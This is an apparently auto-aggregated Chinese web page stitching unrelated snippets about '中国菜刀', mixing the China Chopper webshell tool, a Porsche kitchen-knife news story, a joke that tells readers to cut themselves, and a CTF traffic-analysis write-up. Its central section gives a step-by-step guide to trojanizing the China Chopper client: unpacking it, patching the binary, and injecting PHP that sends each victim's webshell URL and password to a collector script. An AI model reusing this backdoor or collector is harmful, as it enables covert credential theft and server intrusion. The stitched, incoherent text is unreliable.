本文目录一览:
- 1、用中国菜刀连接一句话木马时为何会出现加载失败问题
- 2、中国菜刀使用教程
- 3、热搜!保时捷网售“中国标准”菜刀,1700元/把,公司如何回应此事的?
- 4、如何给中国菜刀添加隐蔽后门
- 5、为什么我的中国菜刀链接我自己的服务器,无法执行cmd显示执行命令失败,对方启动安全模式
- 6、Wareshark&Omnipeek使用----铁三数据赛6.1
用中国菜刀连接一句话木马时为何会出现加载失败问题
刀菜需要自己做变形,加载失败可能是服务器WAF拦截了,传统一句话优化看这:那些强悍的PHP一句话后门;推荐使用新技术:“冰蝎”动态二进制加密网站管理客户端,WebShell工具
中国菜刀使用教程
用你的右手,捂住刀柄,刀的锋利处,对准你自己,用力一砍,你将成为第一个会使用中国菜刀的人(注意,日本武士道的切腹就是仿照中国菜刀的使用方法)
热搜!保时捷网售“中国标准”菜刀,1700元/把,公司如何回应此事的?
该公司回应,这把菜刀能够拍蒜。保时捷在网上售卖一款中国标准的菜刀,售价竟然高达1700元钱,不得不说,这个售价实在太过高昂,也引起了很多网友的广泛讨论。这款菜刀连刀柄的部分都是采用的不锈钢结构,也是一款一体式中国菜刀,该踩到的售价为240美元,保时捷设计上海地区销售人员回应,这款菜刀可以拍蒜,但具体的使用方法应该咨询当地的销售公司。
1.该公司回应此事的话术还是比较官方的,也比较幽默,能够得到网友理解
这款保时捷菜刀在网上的销售情况还是比较良好的,在美国和英国以及加拿大网站地区已经售罄,一次下单可以购买两把菜刀。菜刀的介绍声称,来自中国的标准,这把菜刀有一斤多重,刀片长度为17.3厘米,而且这款菜刀介绍为东方厨房不可或缺的刀具,不适合用来斩骨头。这款菜刀也是纯301钢,是由保时捷设计的,刀片十分锋利。
2.该公司回应此事也引发了网友的大量关注,曾经发生过张小泉菜刀拍蒜断掉的事,所以网友对这款菜刀也比较放心
曾经张小泉菜刀的客服表示,菜刀不能够用来拍蒜,而保时捷精品设计销售上海有限公司的工作人员表示,可以用来拍蒜,这款菜刀也是由保时捷股份子公司进行设计的,这款菜刀中含有铬元素,能够耐大气腐蚀,而且表面也非常光滑。
总而言之,公司回应此事还是非常及时的,这款保时捷中国标准的菜刀售价确实是有些高了,但是绝对物有所值,这款菜刀所用的材料是非常好的,有着很高的抗拉强度,不过,也有网友表示,这样的菜刀恐怕没有人买单。
如何给中国菜刀添加隐蔽后门
1、后门如何触发
这里要先讲下菜刀的后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。
当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图
当我们执行右键-编辑文件时,我们的后门就会被触发(我们要添加的就是这样的一个隐藏后门)。
2、菜刀脱壳
在分析菜刀前,先把菜刀的壳脱掉,使用Peid可知,菜刀是UPx壳,网上找个Upx的脱壳工具即可脱壳。
3、查看数据包,分析流程(右键-编辑)
本地搭建好环境后,在菜刀中右键-编辑查看某一文件,使用burpsuite进行抓包,
数据如下
a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3Bz0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3Dz1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D
一共有3个参数,
a url解码后为@eval (base64_decode($_POST[z0]));
z0先url解码,在base64解码为
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|-");die();
Z1先url解码,在base64解码为
C:\\wamp\\www\\robots.txt
稍微熟悉php的人应该能看出来,这段代码就是一个读文件的php脚本,由菜刀发送到目标服务器上,然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上,那我我们可以再字符串上添加我们想执行的代码,由菜刀一起发送过去执行。
if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
如果我们将上这段代码作为字符串,发送到服务端执行,我们就能获得webshell的地址和密码。
4、使用OD分析
使用OD打开中国菜刀,右键搜索字符串,结果如下:
定位到php读取文的字符串处,点击进去到代码处
可知,程序时将其作为字符串,压入栈中作为参数被后续函数处理的,如果在这段字符串后加入我们的后门代码,就会被程序一块发送到服务端执行。
5、修改菜刀程序文件
由上可知,字符串的地址为0x49ba94,查看内存数据,
发现其后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。
这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。
将后门字符串
$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
放到文件841d0处
打开010editor 将上述字符串复制到010editor中,
由于程序中的字符串是双字节存放的,这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换
使用010editor打开菜刀程序,跳到841d0h偏移处,将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度,
保存文件,这样后门字符串就被我们添加到程序中了。
6、使用OD修改程序代码
用OD打开菜刀程序,定位到第4步中字符串入栈的代码处 push 0049bae4。
0049bae4地址是修改前字符串的位置,现在我们将其改成我们添加的字符串的地质处,字符串文件偏移为841d0h,转化内存偏移为4841d0h,代码修改如下
保存修改的文件即可。
7、测试修改结果
修改文件后,我们在看看菜刀-右键编辑,抓到数据包
Z0解密后为
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|-");die();
可见我们的后门代码也一起被发送到服务端执行了。
编写加单的getx.php接收结果,
getx.php:
?php
$getx = $_GET["caidao"];
$file = fopen("getx.txt","a+");
fwrite($file,$getx);
fwrite($file,"\r\n");
fclose($file);
?
结果如下:
8、后记
通过测试可知,对于asp,aspx跟php后门的添加相似,都可以实现。Jsp木马形式不一,实现添加后门较为困难。另外,由于后门是在服务端执行的,所以不容易被发现,本地抓包是检测不到后门的;OD中右键查看后门地址也是不能直接看到的。
为什么我的中国菜刀链接我自己的服务器,无法执行cmd显示执行命令失败,对方启动安全模式
您好,电脑基础专业芝麻团队奶沫为您解答!(望采纳,谢谢)
中国菜刀是黑客用的吧?
Wareshark&Omnipeek使用----铁三数据赛6.1
铁三的数据赛个人感觉出的非常好,比较适合我这样的新手,有兴趣的师傅们可以来玩一玩啊!
这里给大家共享一下
1个G+的流量包,首先wareshark导出http特定分组.
直接就可以看到192.1681.74与202.1.1.2之间的颜色最亮,而且没有其他的线,很奇怪,所以初步判断这两个有问题,然后在导出第二个数据包,在继续看
仍然192.1681.74与202.1.1.2之间的颜色最亮,在打开第三个
说到主机名,考虑phpinfo,然后使用wareshark直接搜关键字
找第一个主机的phpinfo
同理,另外一台主机也有了(第2个和第六个)
这个太简答 了,直接看就好
工具分析,黑客是在第二个数据包中拿到了1.74的权限,直接看攻击者干了什么
直接看攻击者干了什么
典型的中国菜刀一句话木马
黑客已经拿中国菜刀连接上了,而且是windows电脑,所以会用到netstat指令
对指令进行过滤
可以看到聪明的黑客对指令进行了base64编码
逐条解密
继续向下看黑客使用了哪些命令
隔一两条就能发现解码如下的东西
根据之前的也可以知道,直接就是那个
这个题想到了比赛时候渗透那个题,学长还是厉害,给一个什么都没有的主机装了一大堆工具,然后扫描内网,爽歪歪....
老套路
同样是在第三个数据包中,继续向下看
答案
前面找端口的时候可以直接看到ip范围
直接搜索关键字sql
直接搜关键字root 或者admin
前面顺便可以找到15
前面顺便可以找到
emmmmmmm
这个考脑洞,自己体会
也顺便可以找到
直接搜关键字
然后在第1个和第4个里面可以找到